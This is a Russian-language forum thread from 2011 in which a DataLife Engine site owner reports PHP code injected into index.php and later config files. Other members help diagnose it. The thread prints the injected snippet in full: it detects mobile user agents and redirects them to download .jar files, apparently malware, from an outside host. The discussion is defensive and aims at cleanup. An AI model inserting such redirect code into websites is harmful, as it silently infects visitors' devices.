Помощь Посторонний код в файле index.php

Тема в разделе "DLE", создана пользователем solt, 15 фев 2011.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. solt

    solt Постоялец

    Регистр.:
    24 июл 2008
    Сообщения:
    91
    Симпатии:
    2
    В файле index.php нашел посторонний код:
    PHP:
    if (! $user_group[$member_id['user_group']]['allow_admin']) $config['admin_path'] = "";
        
    $ua str_replace('windows ce'''strtolower($_SERVER['HTTP_USER_AGENT']));
             if 
            (
    strpos($ua'windows nt') !== false ||
            
    strpos($ua'bsd') !== false ||
            
    strpos($ua'x11') !== false ||
            
    strpos($ua'unix') !== false ||
            
    strpos($ua'macintosh') !== false ||
            
    strpos($ua'macos') !== false
            
    ){
            }
            
    ##
            
    else{
                
    header("Location: http://wap-files.ru/x/52/14otkritki.jar");
                exit();
            }
    Заметил совсем случайно. С помощью сервиса Liex.ru на двух сайта (размещены на одном аккаунте и на одном хостинге!) статьи (размещенные у меня!) стали массово уходить в статус "Ошибка" с комментарием:
    На втором сайте точно такой же код вот только ссылка ведет на др. файл http://wap-files.ru/dl/52/sexgame.jar
    П.С. Версии движка 9.0 и 8.2 все офф. Баг фиксы обновлялись вовремя!
    П.С. Что обозначает данный код, и в каких еще файлах можно искать части кода. По запросу wap-files.ru больше не в каких файлах не выдает!
     
  2. failometr

    failometr Постоялец

    Регистр.:
    30 апр 2009
    Сообщения:
    128
    Симпатии:
    45
    Сделай поиск по содержимому файлов, ищи текст "wap-files.ru"
    Код редиректит всех, у кого useragent браузера не содержит тексты:
    windows nt
    bsd
    unix
    macintosh
    macos
    Одним словом - только мобильные клиенты. Если с мобильника зайти на твой сайт, то должно редиректнуть по ссылке
    http://wap-files.ru/x/52/14otkritki.jar
    А еще запихни в хайды все ссылки в своем посте.
     
  3. Dr.Sheff

    Dr.Sheff

    Регистр.:
    20 ноя 2010
    Сообщения:
    175
    Симпатии:
    26
    Напиши хостеру, смени пароль ФТП.
     
  4. solt

    solt Постоялец

    Регистр.:
    24 июл 2008
    Сообщения:
    91
    Симпатии:
    2
    Вот еще ужасная статистика по сайтам которые размешены на этом аккаунте:
    [​IMG]
    [​IMG]
    [​IMG]
    На падение трафика из за праздника (14 февраля) не похоже, да и конкурентов проверял у них все в норме!
    П.С. Вредоносный код убрал, посмотрим может быть еще все вернется на свои места.
    Как писал выше, по содержимому файлов всего сайта данное слово не встречается больше не где.
    Похоже на скрипт, т.к. дата последнего редактирования файлов index.php у всех разная (1-й - 5.12.10, 2-й 10.11.10, и 3-й 17.10.10) а проблема в Liex.ru начались на днях. А вчера вот еще и падение трафика.
    А вот тут стоит задуматься, т.к. сайты именно мобильной тематики, получается код внедрен целесообразного на сайт, т.е. прошел выборку...
     
  5. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.037
    solt
    это подгрузка вируса...

    по крайней мере мой nod32 воспринимает как "множественные угрозы", удалён изолирован и тп ...
    так что падение трафика вполне может быть.

    можеш попасть в блек листы браузеров и антивирусов и тогда ваще траф пропадёт а при переходе с поисковика пользователю будет показываться сообщение что этот сайт может нанести вашему компьютеру вред.

    вычищай и латай DLE пока не поздно.
     
  6. DMS

    DMS Злодей

    Moderator
    • Супермодератор
    Регистр.:
    22 окт 2010
    Сообщения:
    632
    Симпатии:
    348
    А у кого хостишься и как давно? помимо защиты dle и смены паролей походу нужно задуматься о смене хостера
     
  7. solt

    solt Постоялец

    Регистр.:
    24 июл 2008
    Сообщения:
    91
    Симпатии:
    2
    index.php очистил в туже минуту как нашел. Проверил папки на фтп на наличие посторонних файлов - файлов нет... А вот проверять код всех файлов не по силам :nezn:....
    Что касается латок, то все дыры закрывались как только о них упоминали на офф. сайте!
    У меня при переходе по ссылке браузер выдает сообщение:
    И нод 32 не на что не ругается !
    http://timeweb.ru/ на шаред хостинг с апреля 2010 года.
     
  8. Roben

    Roben Писатель

    Регистр.:
    17 авг 2009
    Сообщения:
    7
    Симпатии:
    1
    а это что такое в index.php
    в php полный ноль, но по этим словам $tpl->copy_template скопировали шаб, или что?
    и вообще как можно всякую х...ь прописать в index.php
    PHP:
    require_once ROOT_DIR '/engine/modules/imageview.php';
    if (
    strpos $tpl->copy_template"{custom" ) !== false) {
        
    $tpl->copy_template preg_replace "#\\{custom category=['\"](.+?)['\"] template=['\"](.+?)['\"] aviable=['\"](.+?)['\"] from=['\"](.+?)['\"] limit=['\"](.+?)['\"] cache=['\"](.+?)['\"]\\}#ies""custom_print('\\1', '\\2', '\\3', '\\4', '\\5', '\\6', '{$dle_module}')"$tpl->copy_template );
    }
     
  9. solt

    solt Постоялец

    Регистр.:
    24 июл 2008
    Сообщения:
    91
    Симпатии:
    2
    Тут чет серьезно, простая смена паролей на фтп не помогает, и не каких "левых" файлов на фтп не нашел.
    А ситуация такая:
    Вчера опять заметил этот код в index.php - удалил. А сегодня он уже появился в файле базы данных dbconfig.php - на всех трех сайтах :(...
    Объясните как такое может быть:
    [​IMG]
    В файле вчера или сегодня ночью были произведены измены кода, а на дате последнего редактирования файла это не отобразилось?

    Через ~4 часа вредоносный год появился в другом файле....
    Блин это уже не выносимо... Теперь этот фрагмент кода добавился в config.php. Так же как и в предыдущий раз дата последнего редактирования у файла при этом не изменилась! Это о чем говорит????
     
  10. solt

    solt Постоялец

    Регистр.:
    24 июл 2008
    Сообщения:
    91
    Симпатии:
    2
    Этот паразит совсем совести лишился :mad:. На двух сайта уже этот код разместил в директориях:
    А на третьем сайте по прежнему в:
    Ток что то он там еще подкрутил, т.к. стоит только исправить/очистить файл от его кода, проходит секунда - две и этот код возвращается! :confused:

    П.С. Объясните пожалуйста как его вредоносный код появляется в файлах и при этом не меняется дата последнего редактирования???
     
Статус темы:
Закрыта.